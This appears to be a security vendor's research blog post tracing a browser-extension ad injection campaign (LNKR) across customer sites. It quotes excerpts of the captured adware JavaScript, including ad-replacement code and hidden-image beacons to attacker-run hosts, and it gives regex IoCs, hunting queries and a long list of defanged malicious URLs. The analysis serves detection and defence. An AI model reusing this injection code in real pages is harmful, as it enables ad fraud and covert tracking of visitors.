How we connected several incidents our clients’ end-users experienced to a broad ad injection campaign spanning end-users across much of our customer base.
First Incidents
During a new integration of PerimeterX Code Defender in July, the customer alerted us that they had received complaints that several of their end users had experienced fraud after submitting payment details into their website. Our review of the code running on their website revealed nothing malicious.
We then used our visibility into their site and found a very small percentage of end users experiencing Javascript injections which contacted unexpected domains. The small number of affected users made it not likely to be a Magecart attack, as those usually run on as many users as possible instead of a small subset, but we wanted to dot all the i’s and cross all the t’s to verify this wasn’t a more elaborate, targeted attack.
The unexpected domains we encountered, guxuladebu[.]com and wejekihota[.]com, have been registered as recently as 04/2020 and were both tagged as high-risk by our domain intelligence provider. The scripts which were detected in the compromised sessions were injected into the payment iframe, and taking a close look at them revealed unobfuscated code, which included comments and full variable names. The scripts seemingly “only” inject ads and trackers into the page.
The Initial Adware Injection
The opening lines of one of the injections:
var alreadyLoadedMnz = true;
try {
if (typeof(alreadyLoadedFdzScript) == "undefined") {
var euPlugin = true;
var alreadyLoadedFdzScript = true;
var mainPluginKey = "8kime1SUSnpFEB9EJs$JTA";
var countryPlugin = "br";
The injected scripts, losudu.guxuladebu[.]com/scripts/js and fevoki.wejekihota[.]com/scripts/js, both with object and method names such as fdzAdsManager, fdzNativeAds, pushMoreProducts, and replaceAds, it was easy to figure out what was going on; The script would seek out existing ads’ elements and iframes on the page - such as youtube ads, taboola, ligatus or outbrain - and replace them with its own ads.
replaceAds: function (format, element) {
return new Promise(function (resolve) {
if (element.height > 200) {
jKiri.getJSON(
dynamicURL('https://debezihe[.]wejekihota[.]com/assets/nataurl?width='
+ element.width + '&height=' + element.height + '&h='
+ btoa(document.location.host) + '&pk=' + mainPluginKey + '&callback=?'),
null, function (json) {
if (json.url) {
if (jKiri('.native_adn').length >= fdzNativeAds.limit) {
return resolve();
}
if (!document.body.contains(element.item[0])) {
return resolve();
}
element.item.replaceWith(jKiri('<iframe class="native_adn" src="'
+ json.url + '" width="' + element.width + '" height="'
+ element.height
+ '" style="border:none;display:block;margin:auto" />'));
if (json.boost_type && json.boost_type == "ctz") {
fdzNativeAds.trackEvent("show", "native_ads_ctz", element.width + "x"
+ element.height, json.url);
} else if (json.boost_type && json.boost_type == "adthink") {
fdzNativeAds.trackEvent("show", "native_ads_adthink", element.width + "x"
+ element.height, json.url);
} else {
fdzNativeAds.trackEvent("show", "native_ads", element.width + "x"
+ element.height, json.url);
}
return resolve();
} else {
return resolve();
}
});
} else {
return resolve();
}
})
}
It would read specific input fields, such as on google’s shopping tab and other geo-specific sites (the scripts we first analyzed included targeted French speaking users) and inject ads based on the search query, with specific hardcoded categories such as flights and car rentals.
FSGroup And Google Search Results
These Fdz variables can be found on sites as early as 2017, but a more interesting find was the injection of another script from www.searchdirect[.]info/script/kr.php?uid=F248A67B54944A7A45101F4426CF894C&a=8383_ which starts with declaring a few unique variables:
var fsgroup = "28";
var trkid = '5f10493b02471';
var uid = 'F248A67B54944A7A45101F4426CF894C';
var affid = '8383';
var dom = 'www.searchdirect[.]info';
This file is another adware which replaces google’s search results with its own ads, based on a detected keyword in the query string. The script then fake clicks its injected ads to generate revenue. It also tracks which ads are displayed on the page and injects beacon trackers.
Another Injection
Another suspicious injection was found to be hosted on Amazon’s AWS: s3.amazonaws[.]com/jscache/19ff3cca12e47e3099.js and was much noisier than the previous two:
(function(f, i, j) {
var g = "19ff3cca12e47e3099";
var b = (function() {
var l = 3;
var p = parseInt("0");
var o = parseInt("0");
(function() {
var r = ["mid=", "wid=52190", "sid=", "tid=6655", "rid=LAUNCHED"];
a = (window.location.protocol == "http:" ? "http:" : "https:") + "//promlinkdev[.]com/metric/?" + r.join("&");
var q = f.createElement("img");
q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
(document.head || document.documentElement).appendChild(q);
if (typeof q.onload != j) {
q.onload = function() {
q.parentNode && q.parentNode.removeChild(q)
}}})();
It is minimized, and includes among other things:
- Methods to report to C2 (Command & Control) and receive callback functions to run
- A hardcoded list of specific domains and TLDs not to inject to
E.g. lotterysambadresult[.]in, paypal[.]com, anything [.]gov, etc… - A hardcoded list of sites to inject specific banners to, most are in the Russian language
E.g. mail[.]ru, rambler[.]ru, mysearch[.]com, securesurf[.]biz, etc... - Static ads injections as iframes
- Injections of affiliation links
- Facebook injection
- Geolocation based injection allow and deny lists
- Redirection of searches to affiliated search engines
- Ability to inject nodes to input fields and textareas
Besides the fact that it’s much more robust and sophisticated than the previous injection, there was once again the loading of another script, www.findsearchresults[.]info/script/r.php?a=3200&uid=52190x0000xzzzzzzzzzzzzzzzzzzzzz which turned out to be another fsgroup script, mostly identical to the last one:
var fsgroup = "20";
var trkid = '5f201f06995c8';
var uid = '52190X0000XZZZZZZZZZZZZZZZZZZZZZ';
var affid = '3200';
var dom = 'www.findsearchresults[.]info';
Under The Radar
These couple of injections were seen in a small percentage of end-users, and coupled with the lack of evidence for the site being compromised, we assumed it must be a client-side injection, probably malware based, or a malicious browser extension. There was no further action to be taken.
Things Are Clearer The Second Time Around
A couple of days later, another incident surfaced. Though the offending injection originated from a domain tagged as high-risk, it was a match for the script injected from AWS: hardyload[.]com/22783aa0106c0e89f2.js
(function(f, i, j) {
var g = "22783aa0106c0e89f2";
var b = (function() {
var l = 3;
var p = parseInt("0");
var o = parseInt("0");
(function() {
var r = ["mid=", "wid=52658", "sid=", "tid=8824", "rid=LAUNCHED"];
a = (window.location.protocol == "http:" ? "http:" : "https:") + "//hardyload[.]com/metric/?" + r.join("&");
var q = f.createElement("img");
q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
(document.head || document.documentElement).appendChild(q);
if (typeof q.onload != j) {
q.onload = function() {
q.parentNode && q.parentNode.removeChild(q)
}}})();
And just like the previous case, it also loaded the fsgroup script, this time from www.findsearchresults[.]info/script/r.php?a=...
Again, not many sessions displayed this injection and so this was considered to be another case of client-side malware / rogue extension.
Connecting The Dots
While there were two different initial injections, the one starting with alreadyLoadedMnz and the one with the /metric/? in its path, both were adware and both injected the fsgroup script. The injections were also only witnessed in a relatively negligent number of sessions, but we were interested in knowing if this was perhaps a targeted attack against the customer’s users or a general case of client-side infection.
Extracting IoCs
To better understand the spread of these injections, we extracted the following regexp IoCs:
- /script/js\?k=
- /metric/?\?mid=
For both /metric/?mid= and /metric?mid= - /optout/[gs]et
For both /optout/get and /optout/set - ^(https?:)?//[^/]+?/[a-f0-9]{18}\.js$
Pretty generic, but surprisingly returns good results. A good way to remove false positives is to verify both letters and numbers make up the filename
Is It Just Me?
Armed with the IoCs, we searched across our customers for compromised end-users in the past week, and found:
- About 120 different domains with requests matching our IoCs
- Almost all of our Code Defender customers had compromised users visiting their sites
- The number of compromised users wasn’t significant compared to the number of overall visitors to the site
The numbers aren’t staggering to say the least, but from week to week they were consistent and everywhere.
The injections seems to be coming from either Chrome or Firefox browsers, and not from mobile devices, reaffirming our hypothesis that this was a case of malicious extension / client-side malware:
Where Things Got Interesting
One of the tools we use during our investigation is HTTP Archive which we usually search using Google’s BigQuery. We were wondering if perhaps we could find the injections somewhere else on the web. We first looked for more occurrences of the injections we already have; perhaps finding them in context will yield new information? If they are indeed client-side injections we expect not to find any matches. So we first searched for sites which communicate with our already seen domains:
SELECT * FROM `httparchive.response_bodies.2020_08_01_desktop`
WHERE
REGEXP_CONTAINS(url, r'.*(guxuladebu\.com|wejekihota\.com|searchdirect\.info|findsearchresults\.info).*');
And surprisingly we found injections matching those we’ve seen! Not many, but we weren’t expecting to find any! We looked for more examples by searching for unique strings within the injections:
SELECT * FROM `httparchive.response_bodies.2020_08_01_desktop`
WHERE
body LIKE '%/log/?l=error&m="%'
OR body LIKE "var alreadyLoadedMnz%";
This yielded almost 300 results, from different sites, with the injected scripts coming from different domains, with the request URLs all matching our IoCs.
We got practically the same results when we searched for our IoCs with the following query:
SELECT DISTINCT page FROM `httparchive.requests.2020_08_01_desktop`
WHERE
(REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f0-9]{18}\.js$')
AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[0-9]{18}\.js$')
AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f]{18}\.js$'))
OR REGEXP_CONTAINS(url, r'.*(/script/js\?k=|/optout/[gs]et).*');
Why would what we thought was a client-side injection be embedded into sites?
The Missing LNKR
Intrigued, we looked further into the domains involved, and found one of them, cdnapps[.]us, was registered with the email frankomedison1020@gmail.com and a quick google search led us to a KrebsOnSecurity blog entry from March, 2020 which described a similar situation to what we started with, attributed to malicious extensions. The extensions might not have started malicious but were later sold to new owners who turned them into adware. Krebs goes on to suggest how sites were embedded with the same injections - the sites were edited in-browser, while a malicious extension was running in the background, which resulted in malicious code injected into the pages during the online edit.
A more recent blog entry from Netskope refers to this as a LNKR campaign, named after a string found in its earlier iterations back in 2016.
A security researcher named Paul Buonopane has described the LNKR injections, gave several IoCs, and also analyzed a fake extension which was a copy of a legit extension with the malicious injections appended to it.
What Do You Mean It’s Already Taken Care Of?
Now that we had a firmer grasp of what our customers were facing, we knew where to look for guarding against an extension injecting into the session: PerimeterX Page Defender. As it turned out, all of our Page Defender customers were already covered, as any request matching one of the IoCs was already spotted and blocked.
To Conclude
We hope that sharing our journey from the first incident to the identification of the threat and finding the right tool for remediation will give you insight into the way we look at threats. At PerimeterX we research different web threats, from hacked servers, through compromised 3rd-party vendors, to client-side injections. Owing to that we were able to connect the dots and quickly identify the solution - Page Defender, which already blocks the malicious extensions from interfering with the session. Our products sharing a platform means we can leverage intel and capabilities for quick deployment of solutions.
But What Can You Do As An End-User?
As obvious as It may sound, It’s important to stay cautious and look for warning signs when downloading extensions. If at any time you notice changes in your browsing experience (unexpected ads, links being added, etc...) you should review the extensions installed on your browser, perhaps turning them off one at a time to identify the culprit, and consider uninstalling those which are no longer relevant.
Addendum: Adware URLs
Though not exhaustive, this list includes more than 350 URLs which matched the IoCs mentioned above. We wanted to include just the domains at first, but since not all of these domains are inherently malicious (as is the case of amazonaws[.]com), the domain + path can be used to detect the existence of this adware in the network.
minisrclink[.]cool/metric/
cosmeticsrc[.]com/metric/
mikkiload[.]com/metric/
miragework[.]com/metric/
dakotaram[.]com/metric/
dogsamily[.]net/metric/
cilkonlay[.]com/metric/
cosmeticsrc[.]com/optout/get
peterfire[.]net/metric/
qalitygigant[.]com/metric/
fileryjon[.]com/metric/
cosmeticsrc[.]com/optout/set/lat
cosmeticsrc[.]com/optout/set/lt
minisrclink[.]cool/optout/get
minisrclink[.]cool/optout/set/lat
minisrclink[.]cool/optout/set/lt
hardyload[.]com/metric/
mikkiload[.]com/optout/set/lat
mikkiload[.]com/optout/set/lt
mikkiload[.]com/optout/get
cozytech[.]biz/metric/
cosmeticsrc[.]com/2171de9c9971669bb5.js
autroliner[.]com/metric/
joyshoul[.]com/metric/
practiclick[.]xyz/metric/
petercontry[.]net/metric/
clicksapp[.]net/metric/
loungesrc[.]net/metric/
jaretsummer[.]com/metric/
biglinksrc[.]cool/metric/
tracksmall[.]com/metric/
makesure[.]biz/metric/
blinkjork[.]com/metric/
trableflick[.]com/metric/
tribedone[.]org/metric/
dimagesrc[.]com/metric/
simonzody[.]com/metric/
amptylogick[.]com/metric/
dogsamily[.]net/optout/get
miragework[.]com/optout/get
miragework[.]com/optout/set/lat
miragework[.]com/optout/set/lt
massehight[.]com/metric/
goldapps[.]org/metric/
mirakay[.]biz/metric/
dogsamily[.]net/optout/set/lat
dogsamily[.]net/optout/set/lt
peterfire[.]net/optout/set/lat
peterfire[.]net/optout/set/lt
joyshoul[.]com/optout/set/lat
joyshoul[.]com/optout/set/lt
peterfire[.]net/optout/get
losudu.guxuladebu[.]com/scripts/js
qalitygigant[.]com/optout/set/lat
qalitygigant[.]com/optout/set/lt
mikkiload[.]com/2299156fcd9f4015b0.js
proxdevcool[.]com/metric/
qalitygigant[.]com/optout/get
criticalltech[.]com/metric/
keanyjoy[.]com/metric/
joyshoul[.]com/optout/get
craftprimes[.]com/metric/
ciclonrox[.]com/metric/
cosmeticsrc[.]com/optout/set/strtm
cosmeticsrc[.]com/optout/set/userid
cilkonlay[.]com/optout/get
blancfox[.]com/metric/
cilkonlay[.]com/optout/set/lat
cilkonlay[.]com/optout/set/lt
untsorce[.]cool/metric/
acountscr[.]cool/metric/
milkpload[.]net/metric/
pagescr[.]cool/metric/
peterfire[.]net/22a3c76046f79dd0be.js
qalitygigant[.]com/227ee61cbd084e801b.js
mikkiload[.]com/22bc07df48b043c1f3.js
dimagesrc[.]com/21b4eb3b66b8d5e9bb.js
joyshoul[.]com/22bd1a92d57466cd6c.js
dakotaram[.]com/22f6f6120c25710dec.js
fileryjon[.]com/optout/get
fileryjon[.]com/optout/set/lat
fileryjon[.]com/optout/set/lt
clipsold[.]com/metric/
fileryjon[.]com/1ddcff471efda26278.js
minisrclink[.]cool/1e40c8bd4601a5a5a4.js
clicksapp[.]net/215bde2d6ed49fe715.js
clicksapp[.]net/215d9d5ddc1c1332ef.js
mabydick[.]com/metric/
autroliner[.]com/optout/get
autroliner[.]com/optout/set/lat
autroliner[.]com/optout/set/lt
data1.molaroute[.]com/scripts/js
kellyfight[.]com/metric/
statsrc[.]cool/metric/
makesure[.]biz/1dbe49b2db08327925.js
makesure[.]biz/optout/set/lat
makesure[.]biz/optout/set/lt
appslinker[.]net/metric/
hardyload[.]com/optout/set/lat
hardyload[.]com/optout/set/lt
leepraktic[.]net/metric/
makesure[.]biz/optout/get
proghage[.]com/metric/
cehute.ramitetuha[.]com/scripts/js
contendevff[.]com/metric/
craftprimes[.]com/optout/set/lat
craftprimes[.]com/optout/set/lt
data1.routepilipinas[.]com/scripts/js
biglinksrc[.]cool/optout/get
biglinksrc[.]cool/optout/set/lat
biglinksrc[.]cool/optout/set/lt
poruce.neyelanane[.]com/scripts/js
craftprimes[.]com/optout/get
jemova.wurucozujo[.]com/scripts/js
webnicolas[.]net/metric/
blancfox[.]com/1ff0d80f515755dcf2.js
craftprimes[.]com/20618468c2f7627774.js
giraslide[.]com/metric/
autroliner[.]com/225cd6e1ef3a4470f9.js
tracksmall[.]com/optout/set/lat
tracksmall[.]com/optout/set/lt
tribedone[.]org/optout/get
tribedone[.]org/optout/set/lat
biglinksrc[.]cool/1ee798437b5f5d4f98.js
dowlextff[.]com/metric/
fuhupo.lohuwomenu[.]com/scripts/js
mirakay[.]biz/optout/get
mirakay[.]biz/optout/set/lat
mirakay[.]biz/optout/set/lt
petercontry[.]net/optout/set/lat
petercontry[.]net/optout/set/lt
tracksmall[.]com/optout/get
joyshoul[.]com/optout/set/strtm
joyshoul[.]com/optout/set/userid
petercontry[.]net/optout/get
promclickapp[.]biz/1e6ab715a3a95d4603.js
ruzozi.locixugoro[.]com/scripts/js
tribedone[.]org/optout/set/lt
blinkjork[.]com/optout/set/lat
blinkjork[.]com/optout/set/lt
dowlextff[.]com/1d61f2beb014840140.js
hardyload[.]com/optout/set/strtm
hardyload[.]com/optout/set/userid
skillapp[.]net/metric/
blinkjork[.]com/optout/get
crisdomson[.]com/metric/
ideafrank[.]com/metric/
keanyjoy[.]com/optout/get
poligloteapp[.]org/metric/
trableflick[.]com/optout/get
amptylogick[.]com/22a1d8e534b29520d0.js
amptylogick[.]com/optout/get
amptylogick[.]com/optout/set/lat
amptylogick[.]com/optout/set/lt
crisgrey[.]com/188f9ebcdf6890da18.js
darkflags[.]net/metric/
keanyjoy[.]com/optout/set/lat
keanyjoy[.]com/optout/set/lt
mirakay[.]biz/optout/set/strtm
mirakay[.]biz/optout/set/userid
practiclick[.]xyz/optout/set/lat
practiclick[.]xyz/optout/set/lt
promfflinkdev[.]com/1dc30897dfecc6dc73.js
simonzody[.]com/20c3dc56895944c2b8.js
trableflick[.]com/optout/set/lat
tribedone[.]org/20ca34c96a123576ab.js
cilkonlay[.]com/21890722da51ec3508.js
comtakelink[.]xyz/metric/
criticalltech[.]com/optout/get
criticalltech[.]com/optout/set/lat
criticalltech[.]com/optout/set/lt
hardyload[.]com/optout/get
loungesrc[.]net/optout/set/lat
loungesrc[.]net/optout/set/lt
practiclick[.]xyz/optout/get
proxdevcool[.]com/optout/get
proxdevcool[.]com/optout/set/lat
simonzody[.]com/optout/get
simonzody[.]com/optout/set/lat
simonzody[.]com/optout/set/lt
singtraff[.]cool/metric/
goldapps[.]org/optout/get
goldapps[.]org/optout/set/lat
goldapps[.]org/optout/set/lt
jaretsummer[.]com/optout/get
jaretsummer[.]com/optout/set/lat
jaretsummer[.]com/optout/set/lt
practiclick[.]xyz/151d61b828942a88fe.js
proxdevcool[.]com/optout/set/lt
trableflick[.]com/optout/set/lt
tribedone[.]org/20cebcfbc0d833c4d4.js
untsorce[.]cool/optout/set/lat
untsorce[.]cool/optout/set/lt
zerafe.dodecawube[.]com/scripts/js
appslinker[.]net/2135df0d2c8958bb24.js
contendevff[.]com/optout/get
crisdomson[.]com/optout/set/lat
crisdomson[.]com/optout/set/lt
dogsamily[.]net/optout/set/strtm
dogsamily[.]net/optout/set/userid
files-js-ext.s3.us-east-2.amazonaws[.]com/22fae55717eaadaf7d.js
ideafrank[.]com/optout/get
petercontry[.]net/optout/set/strtm
petercontry[.]net/optout/set/userid
protesidenext[.]com/metric/
tracksmall[.]com/2279d81d48c75df8ff.js
untsorce[.]cool/optout/get
amptylogick[.]com/optout/set/strtm
amptylogick[.]com/optout/set/userid
biglinksrc[.]cool/1ece0ed8f49de8d8d2.js
buvihi.xixuzutage[.]com/scripts/js
ciclonrox[.]com/optout/set/lat
ciclonrox[.]com/optout/set/lt
contendevff[.]com/167dc90a2dac606b7f.js
contendevff[.]com/optout/set/lat
contendevff[.]com/optout/set/lt
data1.blicougi[.]com/scripts/js
fevoki.wejekihota[.]com/scripts/js
icelandsue[.]com/metric/
loungesrc[.]net/2263eddcb82daefb75.js
loungesrc[.]net/optout/get
peterfire[.]net/optout/set/strtm
peterfire[.]net/optout/set/userid
platewolf[.]com/metric/
plusdroop[.]net/metric/
proghage[.]com/200321535194dcd04f.js
proghage[.]com/optout/get
proghage[.]com/optout/set/lat
proghage[.]com/optout/set/lt
promfflinkdev[.]com/1dbde180289f843d45.js
untsorce[.]cool/1f90ebeaf3ebeede5d.js
acountscr[.]cool/1e3de9b8ae5c976faf.js
blinkloide[.]com/metric/
ciclonrox[.]com/optout/get
clicksapp[.]net/21604a2096b709a1b4.js
data1.bmi-result[.]com/scripts/js
data1.padirmua[.]com/scripts/js
giraslide[.]com/optout/get
goldapps[.]org/1bb8d5dee1eb4904d8.js
goldapps[.]org/2249d46c4ea44f4b35.js
jigepu.macudivida[.]com/scripts/js
jozeha.levitokitu[.]com/scripts/js
linkangood[.]com/21ef897172770ca75d.js
milkpload[.]net/optout/get
milkpload[.]net/optout/set/lat
milkpload[.]net/optout/set/lt
pagescr[.]cool/16dc1947c10ee7d085.js
pagescr[.]cool/optout/get
pagescr[.]cool/optout/set/lat
pagescr[.]cool/optout/set/lt
practiclick[.]xyz/18b181560802361ac2.js
proudflex[.]org/213db237bbd6bf854a.js
transmapp[.]com/22876adb33772fed1c.js
tribedone[.]org/optout/set/strtm
tribedone[.]org/optout/set/userid
untsorce[.]cool/optout/set/strtm
untsorce[.]cool/optout/set/userid
webnicolas[.]net/optout/get
webnicolas[.]net/optout/set/lat
webnicolas[.]net/optout/set/lt
wusote.hirizasune[.]com/scripts/js
acountscr[.]cool/optout/get
acountscr[.]cool/optout/set/lat
acountscr[.]cool/optout/set/lt
billyjons[.]net/21db1c5c8b372aecca.js
blinkjork[.]com/2169d6bf46fe8cf4e4.js
brigstoneapp[.]com/metric/
clicksapp[.]net/216bf7a0541cc1f953.js
cloudjs.netlify[.]com/1b0166cba6a2cf5418.js
comtakelink[.]xyz/1efc51d492f1470cde.js
comtakelink[.]xyz/optout/get
comtakelink[.]xyz/optout/set/lat
comtakelink[.]xyz/optout/set/lt
crisdomson[.]com/optout/get
darkflags[.]net/optout/get
data1.amorff[.]com/scripts/js
data1.arirs[.]com/scripts/js
data1.emizol[.]com/scripts/js
data1.ilipol[.]com/scripts/js
data1.pletar[.]com/scripts/js
giraslide[.]com/optout/set/lat
giraslide[.]com/optout/set/lt
ideafrank[.]com/optout/set/lat
ideafrank[.]com/optout/set/lt
kafiro.kuwinesume[.]com/scripts/js
kellyfight[.]com/optout/get
kellyfight[.]com/optout/set/lat
kellyfight[.]com/optout/set/lt
leepraktic[.]net/optout/get
leepraktic[.]net/optout/set/lat
leepraktic[.]net/optout/set/lt
mabydick[.]com/optout/get
mabydick[.]com/optout/set/lat
mabydick[.]com/optout/set/lt
massehight[.]com/optout/get
massehight[.]com/optout/set/lat
massehight[.]com/optout/set/lt
miragework[.]com/2255f170533dc275d7.js
mocadi.wisoyekivo[.]com/scripts/js
pingclock[.]net/21db1c5c8b372aecca.js
sijeno.fufesikera[.]com/scripts/js
skillapp[.]net/optout/get
skillapp[.]net/optout/set/lat
skillapp[.]net/optout/set/lt
smackbolt[.]com/2092da88402465d887.js
statsrc[.]cool/1f15217cf56f39194a.js
statsrc[.]cool/optout/get
statsrc[.]cool/optout/set/lat
statsrc[.]cool/optout/set/lt
trableflick[.]com/2271398b0972c49255.js
blancfox[.]com/1f2cf4f473fe9a5b05.js
blancfox[.]com/optout/get
blancfox[.]com/optout/set/lat
blancfox[.]com/optout/set/lt
brigstoneapp[.]com/22c4d87c9433e6bd0d.js
brigstoneapp[.]com/optout/set/lat
brigstoneapp[.]com/optout/set/lt
ciclonrox[.]com/21d4a10d5bc3d00d52.js
clipsold[.]com/21b344a7264ba4c14a.js
clipsold[.]com/optout/set/lat
clipsold[.]com/optout/set/lt
clipsold[.]com/optout/set/strtm
clipsold[.]com/optout/set/userid
cloudjs.netlify[.]com/1aff3cd773129c7ef9.js
crisdomson[.]com/optout/set/strtm
crisdomson[.]com/optout/set/userid
darkflags[.]net/optout/set/lat
darkflags[.]net/optout/set/lt
data1.ahjilop[.]com/scripts/js
data1.argmeteo[.]com/scripts/js
data1.grasow[.]com/scripts/js
data1.motibaba[.]com/scripts/js
data1.plantul[.]com/scripts/js
dekixu.sepopesuja[.]com/scripts/js
dimagesrc[.]com/optout/get
dimagesrc[.]com/optout/set/lat
dimagesrc[.]com/optout/set/lt
fileryjon[.]com/1a855c56ef7ae15d9d.js
hardyload[.]com/22783aa0106c0e89f2.js
hejana.lejesigufi[.]com/scripts/js
jebaye.gumagerudo[.]com/scripts/js
jejoro.miyinokejo[.]com/scripts/js
joyglasses[.]net/metric/
kellyfight[.]com/optout/set/strtm
kellyfight[.]com/optout/set/userid
luzino.kumureyole[.]com/scripts/js
makesure[.]biz/1c9285ea04bd586ce3.js
meyune.jaceloregi[.]com/scripts/js
minisrclink[.]cool/optout/set/strtm
minisrclink[.]cool/optout/set/userid
najiwu.xeyutezepo[.]com/scripts/js
plankjock[.]com/20c1f9347f59cf976e.js
platewolf[.]com/optout/get
plusdroop[.]net/optout/get
protesidenext[.]com/d7903748defdb4e905.js
protesidenext[.]com/optout/get
protesidenext[.]com/optout/set/lat
protesidenext[.]com/optout/set/lt
singtraff[.]cool/1e807542320a86c32c.js
singtraff[.]cool/optout/get
singtraff[.]cool/optout/set/lat
singtraff[.]cool/optout/set/lt
singtraff[.]cool/optout/set/strtm
singtraff[.]cool/optout/set/userid
skillapp[.]net/21449c4855c9415c00.js
vedeyo.razegawomi[.]com/scripts/js
wocaga.fecukuhote[.]com/scripts/js
yatulo.yibivacaji[.]com/scripts/js
yotejo.cevocoxuhu[.]com/scripts/js